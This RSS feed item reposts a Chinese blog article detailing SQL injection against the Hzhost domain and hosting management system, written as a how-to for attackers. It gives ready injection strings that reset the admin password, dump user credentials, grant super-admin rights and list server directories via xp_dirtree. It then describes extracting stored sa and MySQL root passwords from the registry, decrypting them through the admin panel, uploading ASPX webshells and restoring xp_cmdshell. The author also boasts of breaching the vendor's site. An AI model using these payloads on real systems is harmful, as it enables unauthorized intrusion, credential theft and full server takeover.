<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[静怡家园]]></title> 
<link>http://www.zhanghaijun.com/index.php</link> 
<description><![CDATA[书山有路勤为径，学海无涯苦作舟！]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[静怡家园]]></copyright>
<item>
<link>http://www.zhanghaijun.com/post//</link>
<title><![CDATA[华众域名主机管理系统SQL注射漏洞及利用[转]]]></title> 
<author>碟舞飞扬 &lt;webmaster@zhanghaijun.com&gt;</author>
<category><![CDATA[网海拾贝]]></category>
<pubDate>Fri, 13 Feb 2009 12:26:00 +0000</pubDate> 
<guid>http://www.zhanghaijun.com/post//</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;这是一个域名主机实时管理系统。在百度搜索： title: (域名主机实时管理系统) ，会找到大量采用这种系统的网站！太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web程序。和IIS管理程序。实现在线开通的玩 意。所以：我们可以免费申请域名和空间！！哈哈！！！<br/>&nbsp;&nbsp;&nbsp;&nbsp;web程序方面写的非常严谨。大量的过滤。由于是商业版的程序，所以我没有源码。本来是有的，但是放在家里的电脑上。放暑假时搞的shell现在都被删了。。。我现在又比较懒，就没去弄源代码。反正大家知道怎么弄的就行了。<br/>&nbsp;&nbsp;&nbsp;&nbsp;这又是一个文本框的注射。我真不知道作者是怎么想的。其他地方都被过滤了。就留下域名管理这里没过滤。<br/><IMG src="/attachment/2009-2/20090213202623575.jpg"><br/><IMG src="/attachment/2009-2/20090213202624532.jpg"><br/><IMG src="/attachment/2009-2/20090213202625593.jpg"><br/>&nbsp;&nbsp;&nbsp;&nbsp;官方放暑假的时候就被我搞了一遍，过了一个月他发现了。删了我的shell。不知道他怎么知道我从那里下的手搞的他。他居然补了漏洞。先上图，再说下利用方法。<br/>&nbsp;&nbsp;&nbsp;&nbsp;123' Update [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' Where u_nme='admin'--这一句是把用户admin的密码修改为123456。管理员的后台地址一般是http://www.xx.com/master<br/>&nbsp;&nbsp;&nbsp;&nbsp;或者直接在首页登陆了按切换到管理员后台。<br/>&nbsp;&nbsp;&nbsp;&nbsp;<IMG src="/attachment/2009-2/20090213202625636.jpg"><br/>&nbsp;&nbsp;&nbsp;&nbsp;如果admin不是超级管理员，那就有三个办法。<br/>&nbsp;&nbsp;&nbsp;&nbsp;一是自己构造语句爆出来。<br/>&nbsp;&nbsp;&nbsp;&nbsp;二是提升自己注册的用户的权限。<br/>&nbsp;&nbsp;&nbsp;&nbsp;三是直接爆网站路径，再来个差异备份。<br/>&nbsp;&nbsp;&nbsp;&nbsp;第一个方法我给出一条示范语句：<br/>&nbsp;&nbsp;&nbsp;&nbsp;123' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )&gt;0-- and '1'='1可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。<br/>&nbsp;&nbsp;&nbsp;&nbsp;第二个方法是：<br/>&nbsp;&nbsp;&nbsp;&nbsp;123' Update [memlst] SET u_sys=6 Where u_nme='你注册的用户名'--<br/>&nbsp;&nbsp;&nbsp;&nbsp;123' Update [memlst] SET u_pwr=2 Where u_nme='你注册的用户名'--这2句话就能够提升自己为超级管理员<br/>&nbsp;&nbsp;&nbsp;&nbsp;第三个方法很麻烦。但是很有效果。直捣黄龙。。很强大。我给出如下语句，大家自己研究去吧！<br/>&nbsp;&nbsp;&nbsp;&nbsp;爆路径语句<br/>&nbsp;&nbsp;&nbsp;&nbsp;第一步：建立表123' ;drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1<br/>&nbsp;&nbsp;&nbsp;&nbsp;第二步：123' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert foofoofoo execute master..xp_dirtree @z,1,1-- and '1'='1<br/>&nbsp;&nbsp;&nbsp;&nbsp;注意：0x63003a005c00 = C:&#92;&nbsp;&nbsp;为sql ENCODE<br/>&nbsp;&nbsp;&nbsp;&nbsp;其他的自己找工具去转吧！<br/>&nbsp;&nbsp;&nbsp;&nbsp;第三步：暴出总数 123' and (select cast(count(*) as varchar(8000))+char(94) from foofoofoo)&gt;0-- and '1'='1<br/>&nbsp;&nbsp;&nbsp;&nbsp;第四步：暴出你想要的文件夹名字和文件名字 123' and 0&lt;(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top&nbsp;&nbsp;1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)-- and '1'='1<br/>&nbsp;&nbsp;&nbsp;&nbsp;修改中间红色的1，依次爆出。至于差异备份语句。让nbsi3告诉你吧。<br/>&nbsp;&nbsp;&nbsp;&nbsp;对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用！<br/>&nbsp;&nbsp;&nbsp;&nbsp;我记得还有2篇关于hzhost的漏洞利用文章。名字不记得了。大家去搜索“hzhost漏洞”找找吧！里面提到下面两点内容！<br/>&nbsp;&nbsp;&nbsp;&nbsp;1。是提到c:&#92;windows&#92;temp下有hzhost主机留下的ftp登陆记录。有用户名和密码<br/>&nbsp;&nbsp;&nbsp;&nbsp;2。是利用hzhost拿系统主机最高权限的。<br/>&nbsp;&nbsp;&nbsp;&nbsp;安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在&nbsp;&nbsp;&nbsp;&nbsp;HKEY_LOCAL_MACHINE&#92;software&#92;hzhost&#92;config&#92;settings&#92;mysqlpass<br/>HKEY_LOCAL_MACHINE&#92;software&#92;hzhost&#92;config&#92;settings&#92;mastersvrpass<br/>经过了hzhost自己的加密方式，象<br/>eLVClO4tzsKBf#dee52443a3872cc159<br/>这样的字符串。不过在hzhost后台可以还原！拿到了sa密码，或者root密码，最高权限就在眼前！禁止了w.s的话。大家就传aspx木马导撒！<br/>我们传了一个asp木马上去后。在incs&#92;constr.asp下面可以看到数据库连接串。然后连接到数据库。通过执行<br/>Select * FROM [hstlst]<br/>&nbsp;&nbsp;&nbsp;&nbsp;语句。可以看到很多主机记录。如图<br/>&nbsp;&nbsp;&nbsp;&nbsp;<IMG src="/attachment/2009-2/20090213202626170.jpg"><br/>&nbsp;&nbsp;&nbsp;&nbsp;发现什么没有？h_ftppass的密码和hzhost主机自己的加密串很相似。没错，主机管理的密码也是经过他自己的加密方式加了密！而我们在主机管理的地方！<br/>&nbsp;&nbsp;&nbsp;&nbsp;<IMG src="/attachment/2009-2/20090213202626598.jpg"><br/>&nbsp;&nbsp;&nbsp;&nbsp;看到明文密码。说明他又给还原回来了。明白了么？我们先通过aspx木马导出mysql，mssql的root,sa密码加密串后。<br/>&nbsp;&nbsp;&nbsp;&nbsp;<IMG src="/attachment/2009-2/20090213202627563.jpg"><br/>&nbsp;&nbsp;&nbsp;&nbsp;我们通过这条语句，修改别人的主机密码。<br/>&nbsp;&nbsp;&nbsp;&nbsp;Update [hstlst] SET h_ftppss='aPWw3j4zMaK83lHMBof9fc298b1d3d0a' Where h_ID=10000471然后回过头去看主机密码。（这时候被转成了明文）<br/>&nbsp;&nbsp;&nbsp;&nbsp;<IMG src="/attachment/2009-2/20090213202627825.jpg"><br/>&nbsp;&nbsp;&nbsp;&nbsp;就拿到了root密码为：sphil_070921注意：由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行。这方法是看到别人写的[利用hzhost取得最高权限]得到的启发。谢谢他。<br/>&nbsp;&nbsp;&nbsp;&nbsp;我们也可以同样拿到sa密码，用sa帐号密码远程连接，直接恢复xp_cmdshell就可以执行系统命令了！<br/>&nbsp;&nbsp;&nbsp;&nbsp;好了。就此结束！期待牛人写出还原密码程序！！这样就不用麻烦了
]]>
</description>
</item><item>
<link>http://www.zhanghaijun.com/post//#blogcomment</link>
<title><![CDATA[[评论] 华众域名主机管理系统SQL注射漏洞及利用[转]]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://www.zhanghaijun.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>